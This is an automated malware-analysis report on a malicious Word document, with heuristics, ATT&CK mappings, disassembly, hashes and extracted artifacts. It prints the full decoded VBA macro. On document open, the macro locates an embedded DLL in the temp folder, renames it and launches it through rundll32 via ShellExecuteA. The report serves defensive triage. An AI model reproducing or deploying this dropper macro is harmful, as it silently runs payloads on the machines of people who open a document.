MALICIOUS
430
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing a VBA macro with a Document_Open auto-execution routine. This macro uses ShellExecuteA via a PtrDeclare to execute 'rundll32' with arguments pointing to 'omsh.dll', which is likely a dropped payload. The presence of an embedded PE executable and the use of Ole10Native further indicate a malicious intent to deliver and execute a secondary payload.
Heuristics 13
-
Office EPRINT stream contains EMF object high OLE_EPRINT_EMF_OBJECTOLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
-
Embedded PE executable critical OLE_EMBEDDED_EXEMZ/PE header found inside document — possible embedded executable
-
PEB access via FS segment (x86) high SC_PEB_ACCESSPEB access via FS segment (x86)
Disassembly
x86 disassembly · validity: code (0.969) — 7/7 branch targets land on an instruction boundary (100% coherence)0009D404 64a130000000 mov eax, dword ptr fs:[0x30] 0009D40A 8b4068 mov eax, dword ptr [eax + 0x68] 0009D40D c1e808 shr eax, 8 0009D410 a801 test al, 1 0009D412 7510 jne 0x9d424 0009D414 ff7508 push dword ptr [ebp + 8] 0009D417 ff1574600601 call dword ptr [0x1066074] 0009D41D 50 push eax 0009D41E ff1578600601 call dword ptr [0x1066078] 0009D424 ff7508 push dword ptr [ebp + 8] 0009D427 e82d000000 call 0x9d459 0009D42C 59 pop ecx 0009D42D ff7508 push dword ptr [ebp + 8] 0009D430 ff15e8600601 call dword ptr [0x10660e8] 0009D436 cc int3 0009D437 e8e2100100 call 0xae51e 0009D43C 83f801 cmp eax, 1 0009D43F 7415 je 0x9d456 0009D441 648b0d30000000 mov ecx, dword ptr fs:[0x30] 0009D448 8b4968 mov ecx, dword ptr [ecx + 0x68] 0009D44B c1e908 shr ecx, 8 0009D44E f6c101 test cl, 1 0009D451 7503 jne 0x9d456 0009D453 b001 mov al, 1 0009D455 c3 ret 0009D456 32c0 xor al, al 0009D458 c3 ret 0009D459 8bff mov edi, edi 0009D45B 55 push ebp 0009D45C 8bec mov ebp, esp 0009D45E 51 push ecx 0009D45F 8365fc00 and dword ptr [ebp - 4], 0 0009D463 8d .byte 0x8d
-
Reference to ShellExecute API high SC_STR_SHELLEXECReference to ShellExecute API
-
Reference to LoadLibrary API high SC_STR_LOADLIBRARYReference to LoadLibrary API
-
Reference to GetProcAddress API high SC_STR_GETPROCADDRESSReference to GetProcAddress API
-
Ole10Native package carries executable/script file type high OFFICE_PACKAGE_RISKY_FILEOLE Package displayName or fullPath ends in an executable or script-capable extension. Even without UI extension spoofing, embedding a runnable payload inside an Office document is a high-risk delivery pattern.
-
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set FSO = CreateObject("Scripting.FileSystemObject") -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECTReference to VirtualProtect API
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 4
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2114 bytes |
SHA-256: 919173ba39a62c6a171e4e84e02f9ee0db4d3ea27bb5a206ac7e07964c450503 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Option Compare Text
Private Declare PtrSafe Function gc Lib "shell32" _
Alias "ShellExecuteA" (ByVal hwnd As Long, _
ByVal lpOperation As String, ByVal lpFile As String, _
ByVal lpParameters As String, ByVal lpDirectory As String, _
ByVal nShowCmd As Long) As Long
Dim hdv As String
Private Sub Document_Open()
Dim vcbc As String
vcbc = Options.DefaultFilePath(wdAutoRecoverPath)
Dim xc
xc = "texmp"
If Dir(vcbc & "\omsh.dll") = "" Then
Call yyy
Call xxx
If Len(hdv) > 2 Then
Call nam(hdv)
Dim ued As String
ued = ".exe"
gc 0, vbNullString, _
"rundl" & "l32", Options.DefaultFilePath(wdAutoRecoverPath) & "\omsh.dll,TFPWQPUJLMG", _
vbNullString, 1
End If
End If
End Sub
Sub yyy()
Selection.MoveDown Unit:=wdLine, Count:=3
Selection.MoveRight Unit:=wdCharacter, Count:=2
Selection.MoveDown Unit:=wdLine, Count:=3
Selection.MoveRight Unit:=wdCharacter, Count:=2
Selection.TypeBackspace
Selection.Copy
End Sub
Sub xxx()
Dim usx
usx = Options.DefaultFilePath(wdTempFilePath)
Dim FSO As Object
Set FSO = CreateObject("Scripting.FileSystemObject")
Call Search(FSO.GetFolder(usx), hdv)
End Sub
Attribute VB_Name = "Module1"
Sub bvcbc()
Dim fdsf
fdsf = "ngffds"
End Sub
Sub nam(pafs As String)
Name pafs As Options.DefaultFilePath(wdAutoRecoverPath) & "\omsh.dll"
End Sub
Sub bcvsf()
Dim cxv
cxv = "vdcvdsf"
End Sub
Sub Search(mds As Object, pafs As String)
Dim Nedc As Object
For Each Nedc In mds.SubFolders
Search Nedc, pafs
Next Nedc
Dim Ters As Object
For Each Ters In mds.Files
If Ters.Name = "omh.dll" Then
pafs = Ters
End If
Next Ters
Exit Sub
ErrHandle:
Err.Clear
End Sub
|
|||
embedded_office_0008f46e.exe |
embedded-pe | Office MZ+PE at offset 0x8F46E | 609170 bytes |
SHA-256: 7d0eed187b6cdead8f2df01466f2079e8d31880b0ab3e9afd993b2bce2b4c55d |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Static shellcode analysis found candidate code region(s). Indicators: SC_PEB_ACCESS, SC_STR_VIRTUALPROTECT, SC_STR_GETPROCADDRESS Static shellcode analysis recovered API/import strings: kernel32.dll, KERNEL32.DLL, VirtualProtect, VirtualProtectEx, OpenProcess, RegOpenKeyExA Carved macro source contains an auto-exec entry point and execution/download terms.
|
|||
ole10native_00.bin |
ole-package | OLE Ole10Native stream: ObjectPool/_1684621631/Ole10Native | 576300 bytes |
SHA-256: c49a57894e81f5a5d6f9e00b7e5641ec89cc55736587ef9e3b2597c0c77fc38e |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Static shellcode analysis found candidate code region(s). Indicators: SC_PEB_ACCESS, SC_STR_VIRTUALPROTECT, SC_STR_GETPROCADDRESS Static shellcode analysis recovered API/import strings: kernel32.dll, KERNEL32.DLL, VirtualProtect, VirtualProtectEx, OpenProcess, RegOpenKeyExA
|
|||
ole10native_00_omh.dll |
ole-package-payload | OLE Ole10Native payload: ObjectPool/_1684621631/Ole10Native; display_name=omh.dll; full_path=C:\Users\MyPc\AppData\Local\Temp\omh.dll; temp_path=; def_file= | 576000 bytes |
SHA-256: 061da9f77365d9f1e755080321b22b6931be6ee002bf99215ae5a1083cc25d0c |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Static shellcode analysis found candidate code region(s). Indicators: SC_PEB_ACCESS, SC_STR_VIRTUALPROTECT, SC_STR_GETPROCADDRESS Static shellcode analysis recovered API/import strings: kernel32.dll, KERNEL32.DLL, VirtualProtect, VirtualProtectEx, OpenProcess, RegOpenKeyExA
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.